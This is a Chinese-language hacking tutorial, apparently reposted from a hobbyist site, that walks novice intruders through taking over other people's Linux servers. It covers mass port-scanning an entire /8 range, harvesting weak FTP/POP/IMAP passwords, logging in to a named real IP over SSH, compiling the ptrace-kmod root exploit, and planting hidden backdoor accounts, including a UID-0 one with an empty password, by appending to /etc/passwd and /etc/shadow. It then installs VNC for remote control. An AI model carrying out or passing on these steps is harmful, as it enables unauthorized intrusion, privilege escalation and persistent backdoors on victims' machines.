投向Linux肉雞的懷抱
發(fā)表時(shí)間:2023-06-02 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]適合讀者:入侵愛好者、普通Linux網(wǎng)民前置知識(shí):Linux基本操作投向Linux肉雞的懷抱文/圖 密界尋蹤 很多菜鳥都在重復(fù)的玩3389肉雞, 時(shí)間長(zhǎng)了自然就膩味了, 非常夢(mèng)想得到自己的Li...
適合讀者:入侵愛好者、普通Linux網(wǎng)民
前置知識(shí):Linux基本操作
投向Linux肉雞的懷抱
文/圖 密界尋蹤
很多菜鳥都在重復(fù)的玩3389肉雞, 時(shí)間長(zhǎng)了自然就膩味了, 非常夢(mèng)想得到自己的Linux肉雞。 今天我就寫一篇關(guān)于菜鳥如何獲得大量Linux肉雞的方法。
需要工具如下:Ssport, 下載地址:
HSCAN, 下載地址:
http://www.cnhonker.com/download/releases/Tools/hscan.zip
Putty, 下載地址:
另外還需要一個(gè)VNC的Linux版本, 頭一次得到自己的Linux肉雞, 當(dāng)然要看看它的桌面了。 工具基本齊全了, 下面首先請(qǐng)出Ssport這個(gè)強(qiáng)大的、特別適合新手入侵者使用的掃描器。 程序界面如圖1所示。
圖1
軟件的中部位置有端口設(shè)置, 我們添加如下端口22, 23, 512, 513, 514。 程序上方有IP段落設(shè)置, 既然想得到大量Linux肉雞, 范圍不防設(shè)置大點(diǎn), 211.0.0.1_211.255.255.255(腳本小子:記得在自己比較穩(wěn)定的3389肉雞上掃描, 自己的機(jī)器可舍不得啊, 太費(fèi)電了吧?)。
經(jīng)過好幾天的等待, 終于掃描結(jié)束了。 其實(shí)Ssport非常方便, 中途你覺得差不多的時(shí)候, 可以保存部分結(jié)果進(jìn)行下一步動(dòng)作。 讓這個(gè)工具繼續(xù)掃描時(shí)候, 它不但從原先的結(jié)束點(diǎn)開始, 還會(huì)問你是把掃描的結(jié)果剪除后繼續(xù)掃描, 還是不刪除原先的結(jié)果掃描, 很體貼的。 將結(jié)果導(dǎo)出為一個(gè)文本文件, 我們需要簡(jiǎn)單處理。 如圖2所示。
圖2
選擇替換把22、23、512、513、514全部處理掉, 就會(huì)得到一個(gè)干凈的IP地址列表。 下面就需要我們的第二個(gè)工具HSCAN出場(chǎng)了。 程序的界面如圖3所示。
圖3
我們依次選Menu菜單->Pamareter子菜單->Hostlist, 把我們剛才整理的IP地址文本導(dǎo)入, 還要記得把Ping host before scan選項(xiàng)給去掉, 這樣可以多得到些信息, 不過花費(fèi)的時(shí)間更長(zhǎng)。
掃描范圍選擇好了, 再來選擇掃描模塊, Modules在這里我們選擇Check ftp weak accounts、Check pop3 weak accounts和Check imap weak accounts三個(gè)模塊, 開始掃描吧!最終HSCAN會(huì)給我們一份掃描報(bào)告。 如圖4所示。
圖4
看清楚了么?我們仔細(xì)的看這份報(bào)告。 對(duì)于發(fā)現(xiàn)了弱口令, 且關(guān)于FTP、POP、IMAP版本有WU-FTP、VSFTP、PROFTP和Linux、Unix字樣的肯定就是Linux系統(tǒng)。 看到了報(bào)告嗎?61.197.254.149這個(gè)IP就有弱口令, 它的FTP版本是WU-2.6.2.5, 肯定是一個(gè)Linux系統(tǒng)。
現(xiàn)在我們要想辦法登陸上它的系統(tǒng), 這時(shí)候用我們的第三個(gè)工具Putty。 如果你還保存有IP地址的原始數(shù)據(jù), 就是剛剛用SSPORT掃描后還帶有端口信息的那個(gè)文本, 我們就可以查到61.197.254.149這個(gè)IP開放的端口信息, 它的22端口是開放的。 這正好方便我們, 打開PUTTY, 填寫IP61.197.254.149, 選擇SSH協(xié)議, 點(diǎn)擊打開。 過一會(huì)兒會(huì)彈出如圖5所示的界面。
圖5
我們只要點(diǎn)YES就會(huì)出現(xiàn)登陸提示, 按照掃描出來的弱口令點(diǎn)登陸就連接到對(duì)方主機(jī)上了。 如圖6所示。
圖6
輸入命令Uname –a查看內(nèi)核版本, 一般版本都不高, 給大家推薦一個(gè)好的本地溢出代碼, 連接地址如下:http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c。 我們先在命令提示下輸入Cat >1.c, 然后選擇復(fù)制這段代碼, 粘貼到肉雞上。 如圖8所示。
圖8
然后用Ctrl+z鍵這段代碼就被保存在肉雞上了。 下面我們編譯它, 輸入命令“gcc -o 1 1.c”, 如圖9所示。
圖9
然后執(zhí)行這個(gè)命令, 哈哈, 看到了么?所有的ID為0, 提示符變成了#號(hào), 我們已經(jīng)是管理員了!如圖10所示。
圖10
加個(gè)自己的用戶吧:
mkdir /home/.network
echo network::500:500::/home/.network:/bin/bash>>/etc/passwd
echo network::::::::>>/etc/shadow
passwd network
加個(gè)管理員以后方便自己:
echo xctc::::::::>>/etc/shadow
echo xctc::0:0::/home/.network:/bin/bash>>/etc/passwd
passwd xctc
如圖11所示。
圖11
好了, 入侵告一段落。
相信很多菜鳥都很渴望看到Linux的桌面。 那么我們就給他安裝VNC吧, 因?yàn)樗强缙脚_(tái)的, 而且客戶端訪問可以在瀏覽器里面進(jìn)行。 安裝方法很簡(jiǎn)單:
tar zxvf vnc-3.3.3r1_x86_linux_2.0.tgz
cd vnc_x86_linux_2.0
cp *vnc* /usr/local/bin/
mkdir /usr/local/vnc
cp -r classes/ /usr/local/vnc/
設(shè)置Vnc Server的訪問密碼:
vncpasswd
啟動(dòng)Vnc Server:
vncserver
最新版本的VNC安裝方式就更簡(jiǎn)單了, 大家可以到這里去下載:
http://www.realvnc.com
安裝好后有時(shí)候不能看到漂亮的Linux桌面, 需要我們執(zhí)行下面命令的任何一個(gè), Startkde或者Gnome-session, 這兩命令一個(gè)是啟動(dòng)到KDE桌面, 一個(gè)是啟動(dòng)到GNOME桌面。 先給大家一個(gè)截圖誘惑大家一下吧!這可是在Windows下控制Linux哦!如圖12所示。
圖12
另外大家可以到以下站點(diǎn)找Linux的本地和遠(yuǎn)程溢出代碼:
www.netric.org
http://www.packetstormsecurity.org/
www.cnhonker.com
這篇文章只是希望能指導(dǎo)一下和我一樣的菜鳥們, 高手請(qǐng)悟見笑。 歡迎加我的QQ互相探討交流Linux的入侵經(jīng)驗(yàn):33550。 謝謝觀賞。
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。